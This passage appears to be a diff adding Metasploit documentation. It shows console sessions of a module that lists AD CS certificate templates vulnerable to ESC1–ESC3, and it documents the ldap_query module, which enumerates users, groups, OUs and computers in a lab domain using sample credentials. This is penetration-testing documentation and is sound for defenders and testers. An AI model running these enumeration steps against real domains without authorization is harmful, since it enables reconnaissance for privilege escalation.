+[*] Template: Administrator
+[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: Machine
+[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: DomainController
+[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-498 (Enterprise Read-only Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-516 (Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]       * S-1-5-9 (Enterprise Domain Controllers)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC3-Template2
+[*]    Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > 
+```
+
+### Windows Server 2022 with ADCS and REPORT_NONENROLLABLE Set To TRUE
+```
+msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
+RHOST => 172.26.104.157
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_DN DAFOREST\\Administrator
+BIND_DN => DAFOREST\Administrator
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_PW theAdmin123
+BIND_PW => theAdmin123
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set REPORT_NONENROLLABLE true
+REPORT_NONENROLLABLE => true
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
+
+Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
+
+   Name                  Current Setting         Required  Description
+   ----                  ---------------         --------  -----------
+   BASE_DN                                       no        LDAP base DN if you already have it
+   BIND_DN               DAFOREST\Administrator  no        The username to authenticate to LDAP server
+   BIND_PW               theAdmin123             no        Password for the BIND_DN
+   REPORT_NONENROLLABLE  true                    yes       Report nonenrollable certificate templates
+   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
+                                                           Metasploit
+   RPORT                 389                     yes       The target port
+   SSL                   false                   no        Enable SSL on the LDAP connection
+
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+[*] Running module against 172.26.104.157
+
+[*] Discovering base DN automatically
+[+] 172.26.104.157:389 Discovered base DN: DC=daforest,DC=com
+[*] Template: CA
+[*]    Distinguished Name: CN=CA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    CA not published as an enrollable certificate!
+[*] Template: SubCA
+[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: OfflineRouter
+[*]    Distinguished Name: CN=OfflineRouter,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    OfflineRouter not published as an enrollable certificate!
+[*] Template: ESC1-Template
+[*]    Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC2-Template
+[*]    Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: EnrollmentAgent
+[*]    Distinguished Name: CN=EnrollmentAgent,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    EnrollmentAgent not published as an enrollable certificate!
+[*] Template: EnrollmentAgentOffline
+[*]    Distinguished Name: CN=EnrollmentAgentOffline,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    EnrollmentAgentOffline not published as an enrollable certificate!
+[*] Template: MachineEnrollmentAgent
+[*]    Distinguished Name: CN=MachineEnrollmentAgent,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    MachineEnrollmentAgent not published as an enrollable certificate!
+[*] Template: CEPEncryption
+[*]    Distinguished Name: CN=CEPEncryption,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    CEPEncryption not published as an enrollable certificate!
+[*] Template: ESC3-Template1
+[*]    Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: User
+[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: UserSignature
+[*]    Distinguished Name: CN=UserSignature,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    UserSignature not published as an enrollable certificate!
+[*] Template: SmartcardUser
+[*]    Distinguished Name: CN=SmartcardUser,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    SmartcardUser not published as an enrollable certificate!
+[*] Template: ClientAuth
+[*]    Distinguished Name: CN=ClientAuth,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    ClientAuth not published as an enrollable certificate!
+[*] Template: SmartcardLogon
+[*]    Distinguished Name: CN=SmartcardLogon,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    SmartcardLogon not published as an enrollable certificate!
+[*] Template: Administrator
+[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: Machine
+[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: DomainController
+[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-498 (Enterprise Read-only Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-516 (Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]       * S-1-5-9 (Enterprise Domain Controllers)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC3-Template2
+[*]    Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > 
+```
@@ -0,0 +1,598 @@
+## Vulnerable Application
+This module allows users to query an LDAP server using either a custom LDAP query, or
+a set of LDAP queries under a specific category. Users can also specify a JSON or YAML
+file containing custom queries to be executed using the `RUN_QUERY_FILE` action.
+If this action is specified, then `QUERY_FILE_PATH` must be a path to the location
+of this JSON/YAML file on disk.
+
+Users can also run a single query by using the `RUN_SINGLE_QUERY` option and then setting
+the `QUERY_FILTER` datastore option to the filter to send to the LDAP server and `QUERY_ATTRIBUTES`
+to a comma seperated string containing the list of attributes they are interested in obtaining
+from the results.
+
+As a third option can run one of several predefined queries by setting `ACTION` to the
+appropriate value. These options will be loaded from the `ldap_queries_default.yaml` file
+located in the MSF configuration directory, located by default at `~/.msf4/ldap_queries_default.yaml`.
+
+Note that you can override the default query settings in this way by defining a query with an
+action name that is the same as one of existing actions in the file at
+`data/auxiliary/gather/ldap_query/ldap_queries_default.yaml`. This will however prevent any updates
+for that action that may be made to the `data/auxiliary/gather/ldap_query/ldap_queries_default.yaml`
+file, which may occur as part of Metasploit updates/upgrades, from being used though, so keep this
+in mind when using the `~/.msf4/ldap_queries_default.yaml` file.
+
+All results will be returned to the user in table, CSV or JSON format, depending on the value
+of the `OUTPUT_FORMAT` datastore option. The characters `||` will be used as a delimiter
+should multiple items exist within a single column.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/ldap_query`
+2. Do: `set ACTION <target action>`
+3. Do: `set RHOSTS <target IP(s)>`
+4. Optional: `set RPORT <target port>` if target port is non-default.
+5: Optional: `set SSL true` if the target port is SSL enabled.
+6: Do: `run`
+
+## Options
+
+### OUTPUT_FORMAT
+The output format to use. Can be either `csv`, `table` or `json` for
+CSV, Rex table output, or JSON output respectively.
+
+### BASE_DN
+The LDAP base DN if already obtained. If not supplied, the module will
+automatically attempt to find the base DN for the target LDAP server.
+
+### QUERY_FILE_PATH
+If the `ACTION` is set to `RUN_QUERY_FILE`, then this option is required and
+must be set to the full path to the JSON or YAML file containing the queries to
+be run.
+
+The file format must follow the following convention:
+
+```
+queries:
+  - action: THE ACTION NAME
+    description: "THE ACTION DESCRIPTION"
+    filter: "THE LDAP FILTER"
+    attributes:
+      - dn
+      - displayName
+      - name
+      - description
+```
+
+Where `queries` is an array of queries to be run, each containing an `action` field
+containing the name of the action to be run, a `description` field describing the
+action, a `filter` field containing the filter to send to the LDAP server
+(aka what to search on), and the list of attributes that we are interested in from
+the results as an array.
+
+### QUERY_FILTER
+Used only when the `RUN_SINGLE_QUERY` action is used. This should be set to the filter
+aka query that you want to send to the target LDAP server.
+
+### QUERY_ATTRIBUTES
+Used only when the `RUN_SINGLE_QUERY` action is used. Should be a comma separated list
+of attributes to display from the full result set for each entry that was returned by the
+target LDAP server. Used to filter the results down to manageable sets of data.
+
+## Scenarios
+
+### RUN_SINGLE_QUERY with Table Output
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.27.51.83
+RHOSTS => 172.27.51.83
+msf6 auxiliary(gather/ldap_query) > set ACTION RUN_SINGLE_QUERY
+ACTION => RUN_SINGLE_QUERY
+msf6 auxiliary(gather/ldap_query) > set QUERY_ATTRIBUTES dn,displayName,name
+QUERY_ATTRIBUTES => dn,displayName,name
+msf6 auxiliary(gather/ldap_query) > set QUERY_FILTER (objectClass=*)
+QUERY_FILTER => (objectClass=*)
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.27.51.83
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.27.51.83:389 Discovered base DN: DC=daforest,DC=com
+[*] Sending single query (objectClass=*) to the LDAP server...
+[*] DC=daforest DC=com
+==================
+
+ Name  Attributes
+ ----  ----------
+ name  daforest
+
+[*] CN=Users DC=daforest DC=com
+===========================
+
+ Name  Attributes
+ ----  ----------
+ name  Users
+
+[*] CN=Computers DC=daforest DC=com
+===============================
+
+ Name  Attributes
+ ----  ----------
+ name  Computers
+
+*cut for brevity*
+
+[*] CN=WAPPS1000022 OU=TST OU=Tier 1 DC=daforest DC=com
+===================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WAPPS1000022
+ name         WAPPS1000022
+
+[*] CN=WLPT1000014 OU=AZR OU=Stage DC=daforest DC=com
+=================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WLPT1000014
+ name         WLPT1000014
+
+[*] CN=WWKS1000016 OU=T1-Roles OU=Tier 1 OU=Admin DC=daforest DC=com
+================================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WWKS1000016
+ name         WWKS1000016
+
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+==========================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WVIR1000013
+ name         WVIR1000013
+ 
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### RUN_QUERY_FILE with Table Output
+
+Here is the sample query file we will be using:
+
+```
+$ cat test.yaml
+---
+queries:
+  - action: ENUM_USERS
+    description: "Enumerate users"
+    filter: "(|(objectClass=inetOrgPerson)(objectClass=user)(sAMAccountType=805306368)(objectClass=posixAccount))"
+    columns:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_ORGUNITS
+    description: "Enumerate organizational units"
+    filter: "(objectClass=organizationalUnit)"
+    columns:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_GROUPS
+    description: "Enumerate groups"
+    filter: "(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup))"
+    columns:
+      - dn
+      - name
+      - groupType
+      - memberof
+```
+
+Here is the results of using this file with the `RUN_QUERY_FILE` action which will
+run all queries within the file one after another.
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.27.51.83
+RHOSTS => 172.27.51.83
+msf6 auxiliary(gather/ldap_query) > set ACTION RUN_QUERY_FILE 
+ACTION => RUN_QUERY_FILE
+msf6 auxiliary(gather/ldap_query) > set QUERY_FILE_PATH /home/gwillcox/git/metasploit-framework/test.yaml
+QUERY_FILE_PATH => /home/gwillcox/git/metasploit-framework/test.yaml
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name             Current Setting                     Required  Description
+   ----             ---------------                     --------  -----------
+   BASE_DN                                              no        LDAP base DN if you already have it
+   BIND_DN          normal@daforest.com                 no        The username to authenticate to LDAP server
+   BIND_PW          thePassword123                      no        Password for the BIND_DN
+   OUTPUT_FORMAT    table                               yes       The output format to use (Accepted: csv, table, json)
+   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-fram  no        Path to the JSON or YAML file to load and run queries from
+                    ework/test.yaml
+   RHOSTS           172.27.51.83                        yes       The target host(s), see https://github.com/rapid7/metasploit-f
+                                                                  ramework/wiki/Using-Metasploit
+   RPORT            389                                 yes       The target port
+   SSL              false                               no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   RUN_QUERY_FILE  Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.27.51.83
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.27.51.83:389 Discovered base DN: DC=daforest,DC=com
+[*] Loading queries from /home/gwillcox/git/metasploit-framework/test.yaml...
+[*] Running ENUM_USERS...
+[*] CN=Administrator CN=Users DC=daforest DC=com
+============================================
+
+ Name         Attributes
+ ----         ----------
+ description  Built-in account for administering the computer/domain
+ name         Administrator
+
+[*] CN=Guest CN=Users DC=daforest DC=com
+====================================
+
+ Name         Attributes
+ ----         ----------
+ description  Built-in account for guest access to the computer/domain
+ name         Guest
+
+*cut for brevity*
+
+[*] Running ENUM_ORGUNITS...
+[*] OU=Domain Controllers DC=daforest DC=com
+========================================
+
+ Name         Attributes
+ ----         ----------
+ description  Default container for domain controllers
+ name         Domain Controllers
+
+[*] OU=Admin DC=daforest DC=com
+===========================
+
+ Name  Attributes
+ ----  ----------
+ name  Admin
+
+[*] OU=Tier 0 OU=Admin DC=daforest DC=com
+=====================================
+
+ Name  Attributes
+ ----  ----------
+ name  Tier 0
+
+*cut for brevity*
+
+[*] Running ENUM_GROUPS...
+[*] CN=Administrators CN=Builtin DC=daforest DC=com
+===============================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Administrators
+
+[*] CN=Users CN=Builtin DC=daforest DC=com
+======================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Users
+
+[*] CN=Guests CN=Builtin DC=daforest DC=com
+=======================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Guests
+
+[*] CN=Print Operators CN=Builtin DC=daforest DC=com
+================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Print Operators
+
+[*] CN=Backup Operators CN=Builtin DC=daforest DC=com
+=================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Backup Operators
+ 
+*cut for brevity*
+
+[*] CN=EL-chu-distlist1 OU=T2-Roles OU=Tier 2 OU=Admin DC=daforest DC=com
+=====================================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483646
+ name       EL-chu-distlist1
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with Table Output
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   BASE_DN                         no        LDAP base DN if you already have it
+   BIND_DN                         no        The username to authenticate to LDAP server
+   BIND_PW                         no        Password for the BIND_DN
+   OUTPUT_FORMAT  table            yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
+                                             etasploit
+   RPORT          389              yes       The target port
+   SSL            false            no        Enable SSL on the LDAP connection
+
+msf6 auxiliary(gather/ldap_query) > set ACTION 
+set ACTION ENUM_ACCOUNTS             set ACTION ENUM_DOMAIN_CONTROLLERS   set ACTION ENUM_ORGROLES
+set ACTION ENUM_ALL_OBJECT_CATEGORY  set ACTION ENUM_EXCHANGE_RECIPIENTS  set ACTION ENUM_ORGUNITS
+set ACTION ENUM_ALL_OBJECT_CLASS     set ACTION ENUM_EXCHANGE_SERVERS     set ACTION RUN_QUERY_FILE
+set ACTION ENUM_COMPUTERS            set ACTION ENUM_GROUPS               
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] CN=WIN-F7DQC9SR0HD OU=Domain Controllers DC=daforest DC=com
+===========================================================
+
+ Name                    Attributes
+ ----                    ----------
+ distinguishedname       CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com
+ dnshostname             WIN-F7DQC9SR0HD.daforest.com
+ name                    WIN-F7DQC9SR0HD
+ operatingsystemversion  10.0 (20348)
+
+[*] CN=FSRWLPT1000000 OU=Testing DC=daforest DC=com
+===============================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        FSRWLPT1000000
+ distinguishedname  CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com
+ name               FSRWLPT1000000
+
+[*] CN=TSTWVIR1000000 OU=FSR OU=People DC=daforest DC=com
+=====================================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        TSTWVIR1000000
+ distinguishedname  CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com
+ name               TSTWVIR1000000
+
+*cut for brevity*
+
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+==========================================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        WVIR1000013
+ distinguishedname  CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com
+ name               WVIR1000013
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with CSV Output
+```
